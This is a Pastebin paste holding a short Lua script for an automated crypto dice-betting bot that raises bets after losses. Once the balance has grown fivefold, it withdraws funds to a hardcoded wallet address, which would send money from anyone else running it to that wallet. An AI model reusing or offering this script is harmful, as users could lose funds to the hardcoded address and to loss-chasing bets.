coinwalk

amazing dicebot

Feb 16th, 2020
163
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.73 KB | None | 0 0
  1. lol = balance/1000000
  2. chance = 49.95
  3. nextbet = lol
  4. cox = balance*2
  5. good = balance*5
  6. ninja = 49.95
  7. multi = 2
  8. shit = balance+lol
  9. function dobet()
  10. if win then
  11. bethigh = false
  12. else
  13. nextbet = previousbet*lastBet.Roll/10
  14. bethigh = !bethigh
  15. end
  16. if lastBet.Roll < 50 and lastBet.Roll > 25 then
  17. chance = lastBet.Roll
  18. end
  19. if lastBet.Roll > 50 and lastBet.Roll < 75 then
  20. chance = lastBet.Roll
  21. end
  22. if lastBet.Roll >75 or lastBet.Roll <25 then
  23. chance = 49.95
  24. end
  25. if balance > shit and win then
  26. lol = balance/1000000
  27. nextbet = lol
  28. shit = balance+lol
  29. end
  30. if balance > good then
  31. withdraw (cox,DFy5pT5xNkfPJC32DAddFW8H2c47usFfLB)
  32. end
  33. end
Add Comment
Please, Sign In to add comment